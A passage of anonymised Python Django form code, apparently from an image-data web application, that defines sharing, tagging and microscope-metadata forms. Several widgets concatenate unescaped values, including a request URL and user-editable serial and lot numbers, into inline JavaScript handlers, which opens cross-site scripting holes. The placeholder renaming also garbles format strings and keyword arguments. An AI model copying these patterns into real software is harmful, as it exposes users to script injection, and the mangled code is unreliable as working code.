' YYYY-MM-DD."><img src="%s" /></span>'
) % VAR_1
class CLASS_0(NonASCIIForm):
VAR_10 = forms.CharField(widget=forms.TextInput(attrs={"size": 25}))
class CLASS_1(NonASCIIForm):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_1, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["shareMembers"]:
pass
self.fields["members"] = ExperimenterModelMultipleChoiceField(
queryset=VAR_12["initial"]["experimenters"],
initial=VAR_12["initial"]["shareMembers"],
widget=forms.SelectMultiple(attrs={"size": 28}),
)
except Exception:
self.fields["members"] = ExperimenterModelMultipleChoiceField(
queryset=VAR_12["initial"]["experimenters"],
widget=forms.SelectMultiple(attrs={"size": 28}),
)
self.fields.keyOrder = [
"message",
"expiration",
"enable",
"members",
] # , 'guests']
VAR_13 = forms.CharField(widget=forms.Textarea(attrs={"rows": 5, "cols": 50}))
VAR_14 = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 10}),
label="Expiry date",
help_text=VAR_3,
required=False,
)
VAR_15 = forms.BooleanField(required=False, help_text=VAR_2)
def FUNC_2(self):
if (
self.cleaned_data["expiration"] is not None
and len(self.cleaned_data["expiration"]) < 1
):
return None
if self.cleaned_data["expiration"] is not None:
VAR_44 = str(self.cleaned_data["expiration"]).rsplit("-")
try:
VAR_49 = datetime.datetime.strptime(
("%VAR_23-%s-%s" % (VAR_44[0], VAR_44[1], VAR_44[2])), "%Y-%m-%d"
)
except Exception:
raise forms.ValidationError("Date is in the wrong format. YY-MM-DD")
if time.mktime(VAR_49.timetuple()) <= time.time():
raise forms.ValidationError("Expiry VAR_49 must be in the future.")
return self.cleaned_data["expiration"]
class CLASS_2(CLASS_1):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_2, self).__init__(*VAR_11, **VAR_12)
try:
self.fields["image"] = GroupModelMultipleChoiceField(
queryset=VAR_12["initial"]["images"],
initial=VAR_12["initial"]["selected"],
widget=forms.SelectMultiple(attrs={"size": 10}),
)
except Exception:
self.fields["image"] = GroupModelMultipleChoiceField(
queryset=VAR_12["initial"]["images"],
widget=forms.SelectMultiple(attrs={"size": 10}),
)
class CLASS_3(NonASCIIForm):
VAR_6 = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
VAR_16 = forms.CharField(
widget=forms.Textarea(attrs={"rows": 2, "cols": 49}), required=False
)
VAR_17 = forms.CharField(widget=forms.HiddenInput, required=False)
class CLASS_4(NonASCIIForm):
VAR_6 = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
class CLASS_5(NonASCIIForm):
VAR_16 = forms.CharField(
widget=forms.Textarea(attrs={"rows": 3, "cols": 39}), required=False
)
class CLASS_6(NonASCIIForm):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_6, self).__init__(*VAR_11, **VAR_12)
VAR_25 = "images" in VAR_12["initial"] and VAR_12["initial"]["images"] or list()
if len(VAR_25) > 0:
try:
self.fields["image"] = ObjectModelMultipleChoiceField(
queryset=VAR_25,
initial=VAR_12["initial"]["selected"]["images"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["image"] = ObjectModelMultipleChoiceField(
queryset=VAR_25,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_26 = (
"datasets" in VAR_12["initial"] and VAR_12["initial"]["datasets"] or list()
)
if len(VAR_26) > 0:
try:
self.fields["dataset"] = ObjectModelMultipleChoiceField(
queryset=VAR_26,
initial=VAR_12["initial"]["selected"]["datasets"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["dataset"] = ObjectModelMultipleChoiceField(
queryset=VAR_26,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_27 = (
"projects" in VAR_12["initial"] and VAR_12["initial"]["projects"] or list()
)
if len(VAR_27) > 0:
try:
self.fields["project"] = ObjectModelMultipleChoiceField(
queryset=VAR_27,
initial=VAR_12["initial"]["selected"]["projects"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["project"] = ObjectModelMultipleChoiceField(
queryset=VAR_27,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_28 = (
"screens" in VAR_12["initial"] and VAR_12["initial"]["screens"] or list()
)
if len(VAR_28) > 0:
try:
self.fields["screen"] = ObjectModelMultipleChoiceField(
queryset=VAR_28,
initial=VAR_12["initial"]["selected"]["screens"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["screen"] = ObjectModelMultipleChoiceField(
queryset=VAR_28,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_29 = "plates" in VAR_12["initial"] and VAR_12["initial"]["plates"] or list()
if len(VAR_29) > 0:
try:
self.fields["plate"] = ObjectModelMultipleChoiceField(
queryset=VAR_29,
initial=VAR_12["initial"]["selected"]["plates"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["plate"] = ObjectModelMultipleChoiceField(
queryset=VAR_29,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_30 = (
"acquisitions" in VAR_12["initial"]
and VAR_12["initial"]["acquisitions"]
or list()
)
if len(VAR_30) > 0:
try:
self.fields["acquisition"] = ObjectModelMultipleChoiceField(
queryset=VAR_30,
initial=VAR_12["initial"]["selected"]["acquisitions"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["acquisition"] = ObjectModelMultipleChoiceField(
queryset=VAR_30,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_31 = "wells" in VAR_12["initial"] and VAR_12["initial"]["wells"] or list()
if len(VAR_31) > 0:
try:
self.fields["well"] = ObjectModelMultipleChoiceField(
queryset=VAR_31,
initial=VAR_12["initial"]["selected"]["wells"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["well"] = ObjectModelMultipleChoiceField(
queryset=VAR_31,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
VAR_32 = "shares" in VAR_12["initial"] and VAR_12["initial"]["shares"] or list()
if len(VAR_32) > 0:
try:
self.fields["share"] = ObjectModelMultipleChoiceField(
queryset=VAR_32,
initial=VAR_12["initial"]["selected"]["shares"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["share"] = ObjectModelMultipleChoiceField(
queryset=VAR_32,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
class CLASS_7(CLASS_6):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_7, self).__init__(*VAR_11, **VAR_12)
VAR_18 = forms.CharField(required=False, widget=forms.HiddenInput)
def FUNC_3(self):
VAR_33 = self.cleaned_data["tags"]
if not VAR_33:
return []
try:
VAR_33 = map(int, VAR_33.split(","))
except Exception:
raise forms.ValidationError()
return VAR_33
class CLASS_8(forms.Form):
VAR_19 = forms.CharField(required=True, widget=forms.HiddenInput)
VAR_16 = forms.CharField(required=False, widget=forms.HiddenInput)
VAR_20 = forms.IntegerField(min_value=1, required=False, widget=forms.HiddenInput)
VAR_4 = formset_factory(CLASS_8, extra=0)
class CLASS_9(CLASS_6):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_9, self).__init__(*VAR_11, **VAR_12)
self.fields["files"] = AnnotationModelMultipleChoiceField(
queryset=VAR_12["initial"]["files"],
widget=forms.SelectMultiple(attrs={"size": 8, "class": "existing"}),
required=False,
)
VAR_21 = forms.FileField(required=False)
class CLASS_10(CLASS_6):
VAR_22 = forms.CharField(widget=forms.Textarea(attrs={"rows": 2, "cols": 39}))
class CLASS_11(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_11, self).__init__(*VAR_11, **VAR_12)
try:
self.fields["active_group"] = GroupModelChoiceField(
queryset=VAR_12["initial"]["mygroups"],
initial=VAR_12["initial"]["activeGroup"],
empty_label=None,
widget=forms.Select(
attrs={
"onchange": (
"window.location.href='"
+ reverse(viewname="change_active_group")
+ "?url="
+ VAR_12["initial"]["url"]
+ "&active_group='"
"+this.options[this.selectedIndex].value"
)
}
),
)
except Exception:
self.fields["active_group"] = GroupModelChoiceField(
queryset=VAR_12["initial"]["mygroups"],
initial=VAR_12["initial"]["activeGroup"],
empty_label=None,
widget=forms.Select(
attrs={
"onchange": (
"window.location.href='"
+ reverse(viewname="change_active_group")
+ "?active_group='"
"+this.options[this.selectedIndex].value"
)
}
),
)
self.fields.keyOrder = ["active_group"]
class CLASS_12(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_12, self).__init__(*VAR_11, **VAR_12)
VAR_34, VAR_35 = VAR_12["initial"]["range"]
VAR_36 = [(str(i), "Field#%i" % (i - VAR_34 + 1)) for i in range(VAR_34, VAR_35 + 1)]
self.fields["index"] = forms.ChoiceField(
VAR_36=tuple(VAR_36),
widget=forms.Select(
attrs={
"onchange": ("changeField(this.options[this.selectedIndex].value);")
}
),
)
self.fields.keyOrder = ["index"]
def FUNC_0(VAR_5, VAR_6, VAR_7=False):
VAR_23 = "javascript:FUNC_0(" + str(VAR_5) + ", '" + VAR_6 + "', "
if VAR_7:
VAR_23 += "this.options[this.selectedIndex].value);"
else:
VAR_23 += "this.value);"
return VAR_23
def FUNC_1(VAR_8, VAR_9=True):
VAR_8.widget.attrs["disabled"] = True
if VAR_9:
VAR_8.widget.attrs["class"] = "disabled-metadata"
class CLASS_13(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_13, self).__init__(*VAR_11, **VAR_12)
VAR_37 = VAR_12["initial"]["logicalChannel"]
try:
if VAR_37 is not None:
self.fields["name"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": FUNC_0(VAR_37.id)}
),
initial=VAR_37.name,
required=False,
)
else:
self.fields["name"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
required=False,
)
FUNC_1(self.fields["name"])
except Exception:
self.fields["name"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["name"])
try:
if VAR_37 is not None:
self.fields["excitationWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=VAR_12["initial"]["exWave"].getValue(),
label=("Excitation (%VAR_23)" % VAR_12["initial"]["exWave"].getSymbol()),
required=False,
)
else:
self.fields["excitationWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
label="Excitation",
required=False,
)
FUNC_1(self.fields["excitationWave"])
except Exception:
self.fields["excitationWave"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Excitation",
required=False,
)
FUNC_1(self.fields["excitationWave"])
try:
if VAR_37 is not None:
self.fields["emissionWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=VAR_12["initial"]["emWave"].getValue(),
label=("Emission (%VAR_23)" % VAR_12["initial"]["emWave"].getSymbol()),
required=False,
)
else:
self.fields["emissionWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
label="Emission",
required=False,
)
FUNC_1(self.fields["emissionWave"])
except Exception:
self.fields["emissionWave"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Emission",
required=False,
)
FUNC_1(self.fields["emissionWave"])
try:
if VAR_37 is not None and VAR_37.ndFilter is not None:
self.fields["ndFilter"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=formatPercentFraction(VAR_37.ndFilter),
label="ND filter (%)",
required=False,
)
else:
self.fields["ndFilter"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
label="ND filter (%)",
required=False,
)
FUNC_1(self.fields["ndFilter"], VAR_9=False)
except Exception:
self.fields["ndFilter"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="ND filter (%)",
required=False,
)
FUNC_1(self.fields["ndFilter"], VAR_9=False)
try:
if VAR_37 is not None and VAR_37.pinHoleSize is not None:
self.fields["pinHoleSize"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=VAR_37.pinHoleSize.getValue(),
label=("Pin hole size (%VAR_23)" % VAR_37.pinHoleSize.getSymbol()),
required=False,
)
else:
self.fields["pinHoleSize"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
label="Pin hole size",
required=False,
)
FUNC_1(self.fields["pinHoleSize"], VAR_9=False)
except Exception:
self.fields["pinHoleSize"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pin hole size",
required=False,
)
FUNC_1(self.fields["pinHoleSize"], VAR_9=False)
try:
if VAR_37 is not None:
self.fields["fluor"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=VAR_37.fluor,
required=False,
)
else:
self.fields["fluor"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
required=False,
)
FUNC_1(self.fields["fluor"], VAR_9=False)
except Exception:
self.fields["fluor"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["fluor"], VAR_9=False)
try:
if VAR_37.getIllumination() is not None:
self.fields["illumination"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["illuminations"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "illumination", VAR_7=True
)
}
),
initial=VAR_37.getIllumination(),
required=False,
)
else:
self.fields["illumination"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["illuminations"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "illumination", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["illumination"], VAR_9=False)
except Exception:
self.fields["illumination"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["illumination"], VAR_9=False)
try:
if VAR_37.contrastMethod is not None:
self.fields["contrastMethod"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["contrastMethods"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "contrastMethod", VAR_7=True
)
}
),
initial=VAR_37.getContrastMethod(),
label="Contrast method",
required=False,
)
else:
self.fields["contrastMethod"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["contrastMethods"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "contrastMethod", VAR_7=True
)
}
),
label="Contrast method",
required=False,
)
FUNC_1(self.fields["contrastMethod"])
except Exception:
self.fields["contrastMethod"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Contrast method",
required=False,
)
FUNC_1(self.fields["contrastMethod"])
try:
if VAR_37.getMode() is not None:
self.fields["mode"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["modes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "mode", VAR_7=True
)
}
),
initial=VAR_37.getMode().value,
required=False,
)
else:
self.fields["mode"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["modes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "mode", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["mode"])
except Exception:
self.fields["mode"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["mode"])
try:
if VAR_37.pockelCellSetting is not None:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=VAR_37.pockelCellSetting,
label="Pockel cell",
required=False,
)
else:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
label="Pockel cell",
required=False,
)
FUNC_1(self.fields["pockelCellSetting"])
except Exception:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pockel cell",
required=False,
)
FUNC_1(self.fields["pockelCellSetting"])
self.fields.keyOrder = [
"name",
"excitationWave",
"emissionWave",
"ndFilter",
"pinHoleSize",
"fluor",
"illumination",
"contrastMethod",
"mode",
"pockelCellSetting",
]
class CLASS_14(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_14, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["dichroic"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].id, "manufacturer"
),
}
),
initial=VAR_12["initial"]["dichroic"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].id, "manufacturer"
),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_12["initial"]["dichroic"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].id, "model"
),
}
),
initial=VAR_12["initial"]["dichroic"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].id, "model"
),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_12["initial"]["dichroic"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].serialNumber,
"serialNumber",
),
}
),
initial=VAR_12["initial"]["dichroic"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].serialNumber,
"serialNumber",
),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_12["initial"]["dichroic"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].lotNumber, "lotNumber"
),
}
),
initial=VAR_12["initial"]["dichroic"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].lotNumber, "lotNumber"
),
}
),
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
self.fields.keyOrder = ["model", "manufacturer", "serialNumber", "lotNumber"]
class CLASS_15(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_15, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["microscope"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "model"
),
}
),
initial=VAR_12["initial"]["microscope"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "model"
),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_12["initial"]["microscope"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "manufacturer"
),
}
),
initial=VAR_12["initial"]["microscope"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "manufacturer"
),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_12["initial"]["microscope"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "lotNumber"
),
}
),
initial=VAR_12["initial"]["microscope"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "lotNumber"
),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_12["initial"]["microscope"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "lotNumber"
),
}
),
initial=VAR_12["initial"]["microscope"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "lotNumber"
),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_12["initial"]["microscope"].getMicroscopeType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["microscopeTypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "type", VAR_7=True
)
}
),
initial=VAR_12["initial"]["microscope"].getMicroscopeType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["microscopeTypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "type", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["type"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
]
class CLASS_16(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_16, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["objective"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "model"
),
}
),
initial=VAR_12["initial"]["objective"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "model"
),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_12["initial"]["objective"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "manufacturer"
),
}
),
initial=VAR_12["initial"]["objective"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "manufacturer"
),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_12["initial"]["objective"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "serialNumber"
),
}
),
initial=VAR_12["initial"]["objective"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "serialNumber"
),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_12["initial"]["objective"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].lotNumber, "lotNumber"
),
}
),
initial=VAR_12["initial"]["objective"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["logicalchannel"]
.getObjective()
.lotNumber,
"lotNumber",
),
}
),
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_12["initial"]["objective"].nominalMagnification is not None:
self.fields["nominalMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"nominalMagnification",
),
}
),
initial=VAR_12["initial"]["objective"].nominalMagnification,
label="Nominal magnification",
required=False,
)
else:
self.fields["nominalMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"nominalMagnification",
),
}
),
label="Nominal magnification",
required=False,
)
FUNC_1(self.fields["nominalMagnification"])
except Exception:
self.fields["nominalMagnification"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Nominal magnification",
required=False,
)
FUNC_1(self.fields["nominalMagnification"])
try:
if VAR_12["initial"]["objective"].calibratedMagnification is not None:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"calibratedMagnification",
),
}
),
initial=VAR_12["initial"]["objective"].calibratedMagnification,
label="Calibrated magnification",
required=False,
)
else:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"calibratedMagnification",
),
}
),
label="Calibrated magnification",
required=False,
)
FUNC_1(self.fields["calibratedMagnification"])
except Exception:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Calibrated magnification",
required=False,
)
FUNC_1(self.fields["calibratedMagnification"])
try:
